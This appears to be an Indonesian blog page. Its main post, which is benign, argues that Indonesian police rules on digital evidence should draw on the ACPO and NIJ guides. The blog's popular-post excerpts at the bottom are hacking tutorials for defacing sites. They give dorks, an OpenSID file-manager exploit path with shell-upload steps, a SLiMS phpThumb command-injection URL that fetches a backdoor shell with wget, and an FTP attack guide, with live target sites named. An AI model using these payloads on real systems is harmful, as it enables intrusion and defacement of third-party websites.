Langsung ke konten utama

Penanganan Barang Bukti Digital di Indonesia

 

Kita ketahui bersama bahwa kejagatan siber atau cybercrime semakin meningkat. Indonesia sebagai negara berkembang terkena dampaknya. Kejahatan yang sering terjadi akhir-akhir ini bukan hanya yang bersifat konvensional saja, namun kejahatan siber sangat berkembang. Kita lihat contoh pada beberapa tahun terakhir ini yakni dari kasus pembajakan web, penipuan online sampai pada kasus peretasan sebuah situs tiket online yang merugikan pihak penyedia situs sebesar 4 milyar rupiah. Dari pengungkapan kasus kejahatan siber kita kenal ada istilah barang bukti digital yang bisa saja berupa perangkat elektronik, bisa juga berupa data digital.

Peraturan Kepala Kepolisian Republik Indonesia No. 10 Tahun 2009 mengatur tentang bagaimana penanganan terhadap barang bukti digital yang bersifat gampang dimanipulasi ini. Aturan tersebut menjelaskan bagaimana cara dan syarat permintaan pemeriksaan teknis kriminal tempat kejadian perkara dan laboratoris kriminal barang bukti kepada laboraturium forensik kepolisian negara Republik Indonesia. Selain itu terdapat juga aturan tentang penanganan barang bukti digital, namun tidak membahas secara khusus tentang barang bukti digital. Pembahasannya hanya sebatas prosedur permintaan pemeriksaan barang bukti digital  saja, dan tidak membahas secara detail mengenai teknis yang lengkap.

Hal-hal yang berkaitan dengan penanganan barang bukti digital telah dibahas secara khusus dan independen, dan sudah diterapkan oleh negara-negara yang maju seperti Inggris dan Amerika. Kepolisian Inggris melalui Association of Chief Police Officers (ACPO), mengeluarkan dokumen tentang penanganan barang bukti digital secara khusus. Dokumen tersebut berjudul ACPO Good Practice Guide for Digital Evidence. Dokumen ini menjelaskan mengenai beberapa hal terkait barang bukti digital antara lain:

  1. Penjelasan tentang prinsip bukti digital
  2. Perencanaan tentang pengelompokan/pemetaan potensi-potensi lokasi pada suatu perangkat yang mungkin untuk ditemukannya barang bukti digital.
  3. Teknik dan prosedur dalam mengumpulkan/menyita barang bukti.
  4. Cara menganalisa barang bukti yang ditemukan.
  5. Cara dalam menyajikan presentasi dari temuan bukti digital untuk keperluan persidangan.
  6. Pihak-pihak yang terlibat dalam suatu penanganan barang bukti digital
  7. Pelatihan dan Pendidikan pihak-pihak yang terlibat dalam penanganan barang bukti digital.
  8. Hukum-hukum yang digunakan untuk membahas tentang penanganan barang bukti digital.

Selain itu, ada juga aturan yang dikeluarkan oleh National Institute of Justice (NIJ) Amerika Serikat, dalam dokumennya berjudul Forensic Examination of Digital Evidence : A Guide for Law Enforcement.

Dokumen ini menjelaskan beberapa hal antara lain :

  1. Prosedur dalam penanganan barang bukti digial yang berisi tentang misi, siapa saja personel yang terlibat, bagaimana komitmen sumber dayanya, standar hardware dan software yang digunakan, pelatihan-pelatihan, permintaan layanan (baik fasilitas atau hal lain yang dibutuhkan dalam penanganan), manajemen kasus, penanganan barang bukti dan penyimpanannya, pembuatan SOP, mengembangkan prosedur teknis yang akan digunakan.
  2. Prosedur dalam menilai suatu barang bukti, yang dimulai penjelasan secara detail sebuah kasus dan memberikan penilaian terhadap kasus itu, mengidentifikasi hal-hal apa saja yang perlu dilakukan di TKP, penilaian tentang lokasi akan dilakukanya pengujian barang bukti (di TKP atau di laboraturium forensik), pertimbangan hukum, dan terakhir memberikan penilaian terhadap barang bukti yang ditemukan.
  3. Prosedur tentang bagaimana mengakusisi barang bukti, yang dimulai dari mengamankan barang bukti hingga melakukan verifikasi terhadap keberhasilan akusisi barang bukti dengan membandingkan antara nilai dari bukti yang asli dan duplikasinya.
  4. Prosedur menguji barang bukti, yang dimulai dari persiapan barang bukti yang akan diuji, mengekstrak barang bukti, menganalisa hasil ekstraksi data barang bukti, dan menyimpulkan data-data yang ditemukan dari barang bukti yang diuji.
  5. Prosedur dalam hal dokumentasi dan laporan barang bukti, yang terdiri dari catatan ahli/penguji tentang barang bukti.
  6. Contoh-contoh kasus dan cara penanganan barang bukti yang ditemukan serta contoh laporan suatu investigasi.

Dari kedua dokumen ACPO dan NIJ yang membahas tentang penanganan barang bukti digital, pihak kepolisian Indonesia bisa mengambil beberapa hal yang dianggap penting sehingga dokumen tersebut dapat digunakan sebagai acuan dalam pembuatan dan pengembangan aturan yang khusus membahas penanganan barang bukti digital.

Hal-hal yang dianggap penting untuk ditambahkan dalam aturan kepolisian dalam pengembangan dalam penananganan barang bukti digital adalah antara lain :

  1. Penjelasan tentang definisi dan jenis-jenis barang bukti elektronik yang didalamnya terdapat bukti digital. Dalam aturan polisi Indonesia sebelumnya, barang bukti digital yang dimaksud adalah hanyalah barang bukti yang terdapat pada komputer.
  2. Penjelasan rinci mengenai teknik dan prosedur dalam penyitaan barang bukti digital.
  3. Penjelasan prosedur dalam hal bagaimana mengakusisi barang bukti digital
  4. Penjelasan prosedur dalam menganalisa barang bukti digital.
  5. Penjelasan prosedur dalam melakukan pengujian barang bukti digital
  6. Penjelasan prosedur dalam melakukan dokumentasi dan pembuatan laporan barang bukti digital
  7. Penjelasan tentang cara dalam mempresentasikan barang bukti digital.
  8. Penjelasan mengenai pelatihan dan pendidikan yang perlu diikuti berkaitan dengan kompetensi dan kemampuan yang perlu dimiliki oleh pihak yang menangani barang bukti digital.
  9. Penjelasan tentang hukum-hukum yang berlaku yang terkait dengan bukti digital.
  10. Penjelasan mengenai beberapa kasus yang pernah ditangani beserta laporan tentang barang bukti digital yang ditemukan, sebagai referensi pembelajaran atau bahan perbandingan dalam menyelesaikan kasus-kasus yang akan terjadi di kemudian hari.
Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Deface Poc RFM OpenSID

Dork: "OpenSID Tangerang"            "OpenSID Bandung"            "Desa SID site:"           Exploit: /assets/filemanager/dialog.php?akey=GantiKunciDesa Dorking Dulu Lah Kalianya Nih Live Target : http://kalidengen-kulonprogo.desa.id http://pantaigading.opendesa.id/ Tambahkan Exploitnya..... Terus ntar ada tuh Rfm atau Responsif FileManager Kalian Upload Mini Shell / Uploader Kalian Kalau bisa Rename Jadi format.txt misalnya (shell.php<?.txt) nah itu ntar itu pasti langsung berubah jadi format php...txtnya dah keinject ama <? Nih Comot Mini Uploader Buat Up Shell //Powered By Mr.Colded X Mr.Cold// //Team : 3RROR YOUR SYSTEM // <title>./CryMera - FR13NDS CYBER ARMY </title><center> <body bgcolor= "black" >     <br><br><br><br>     <br>     <font color= "lime" size= "5" >> ./CryMera <</font> <font color= "r
2 komentar
Baca selengkapnya

Slims Command Injection

 Slims 7 PhpThumb Command Injection Dork : Powered By SLIMS 7 (Cendana)  inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id "Powered By Slims7" site:ac.id ~~~~ Check Vuln (command injected) : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9 Upload shell : /lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9 File access : /lib/watermark/shell.php References : https://www.bandung6etar.my.id/2020/09/deface-cms-slims-command-injection.html
Posting Komentar
Baca selengkapnya

Deface poc Ftp Server Attack

Assalamualaikum wr.wb Bagaimana kabar saudara sekalian?? Baik pasti nya yaa Oke di tutorial deface ini saya mau membagikan poc ftp server attack Yang dimana si hacker mengakses data data penting di ftp web tersebut Ada beberapa teknik si hacker mendapatkan akses ke ftp web, Salah satu nya di brute force yaitu mencari password default dari domain web nya Oke dah langsung aja ke tutorialnya Gosah banyak cingcong gosah banyak bacot kalo kata lider kami si padang :v Bahan-bahan : - Dork > intitle:"index of" sftp-config.json            > intitle:"index of" ftpsync.settings - Apk ftp - Shell backdoor, kalo lu gakda shell cek aja di blog ini,, minishell backdoor ~ power f ~ akun pebeh  Gass bewan awp di burning hall :v Oke gesss +Pertama kita buka Apeka ep te pe nya terlebih dahulu eaaa, Live target gue => http://vakantievillacalpedylano.be +Yang kedua kalian pastikan ada akun ftp di web target, +Ketiga kalian masukan host,port,user passwor
Posting Komentar
Baca selengkapnya